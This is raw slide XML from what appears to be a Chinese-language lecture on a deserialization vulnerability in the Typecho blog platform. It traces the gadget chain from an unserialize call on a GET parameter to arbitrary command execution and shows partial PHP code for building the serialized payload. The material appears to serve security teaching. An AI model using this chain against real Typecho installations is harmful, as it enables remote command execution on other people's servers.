                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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config</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8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unserialize</a:t>
            </a:r>
            <a:r>
              <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(base64_decode($_GET['__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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typecho_config</a:t>
            </a:r>
            <a:r>
              <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pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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db</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 new </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Typecho_Db</a:t>
            </a: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config</a:t>
            </a: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['adapter']);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="2968253"/>
            <a:ext cx="10801200" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>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该</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应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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通过</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$_GET[‘__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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typecho_config</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从用户处获取了反序列化的对象，满足反序列化漏洞的基本条件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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unserialize</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的参数可控，这里是漏洞的入口点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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接下来，程序</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实例化了类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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Typecho_Db</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，类的参数是通过反序列化得到的</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err="1"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config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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992263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991866" y="375965"/>
            <a:ext cx="11089233" cy="657184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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如何利用？</a:t>
            </a:r>
            <a:endPar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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957983" y="1033149"/>
            <a:ext cx="11123116" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>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在类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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Typecho_Db</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的构造函数中，进行了字符串拼接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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操作 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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marL="971550" lvl="1" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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魔术方法中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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如果一个</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类被当做字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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处理，那么类中的</a:t>
            </a:r>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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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toString</a:t>
            </a:r>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方法将会被调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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marL="971550" lvl="1" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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全局</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搜索，发现</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类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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Typecho_Feed</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中存在</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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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toString</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方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>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在类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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Typecho_Feed</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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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toString</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方法中，会访问类中私有变量</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$item[‘author’]</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中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"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screenName</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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1154113" lvl="1" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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如果</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$item[‘author’]</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是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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对象</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并且该对象没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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screenName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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属性</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那么这个对象中的</a:t>
            </a:r>
            <a:r>
              <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__get()</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，方法将会被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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调用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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1154113" lvl="1" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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4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Typecho_Request</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类</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中，正好定义了</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__get()</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方法。</a:t>
            </a:r>
            <a:endPar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74682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991866" y="375965"/>
            <a:ext cx="11089233" cy="657184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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如何利用？</a:t>
            </a:r>
            <a:endPar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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957983" y="1312069"/>
            <a:ext cx="11123116" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>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类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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Typecho_Request</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中的</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__get()</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方法会返回</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get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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get</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中调用了</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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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applyFilter</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方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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而</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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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applyFilter</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中，使用了</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8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call_user_function</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函数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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其第一个参数是被调用的函数，第二个参数是被调用的函数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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这里</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$filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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$value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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都是我们可以控制的，因此可以用来执行任意系统命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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至此</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，一条完整的利用链构造成功。</a:t>
            </a:r>
            <a:endPar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01228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DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244799" y="4668788"/>
            <a:ext cx="11123116" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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$age = array(key=&gt;value)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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：创建一个关联数组</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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age[‘Bill’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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结论：要构造一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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adapter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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8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array</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1748855" y="2667182"/>
            <a:ext cx="9077325" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="591989"/>
            <a:ext cx="11089233" cy="2026212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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config</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8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unserialize</a:t>
            </a:r>
            <a:r>
              <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(base64_decode($_GET['__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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typecho_config</a:t>
            </a:r>
            <a:r>
              <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pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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db</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 new </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Typecho_Db</a:t>
            </a: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config</a:t>
            </a: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['adapter']);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"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应该是个什么样的对象？</a:t>
            </a:r>
            <a:endPar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547605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xmlns="" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1129805" y="1024037"/>
            <a:ext cx="11089233" cy="3749761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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rray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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err="1"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adpter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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的值应该是什么呢？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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考虑攻击链中，期望触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"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Typecho_Feed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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__</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toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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dirty="0"/>
              <a:t> public function __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        $this-&gt;item['author']-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>screenName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>因此，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>adapter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>”的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>应该为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Typecho_Feed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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025036776"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1244799" y="4408413"/>
          <a:ext cx="10229028" cy="2376264"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="2376264">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = array(</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    'adapter' =&gt; new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Feed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>echo base64_encode(serialize($</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>));</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2849924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xmlns="" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="447973"/>
            <a:ext cx="11089233" cy="3565095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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思考：如何定义类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"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Typecho_Feed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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Typecho_Feed</a:t>
            </a:r>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private $item;</a:t>
            </a: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public function __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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toString</a:t>
            </a:r>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$this-&gt;item['author']-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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screenName</a:t>
            </a:r>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Item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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里的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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author</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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应该是什么？应该是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"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Typecho_Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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对象</a:t>
            </a:r>
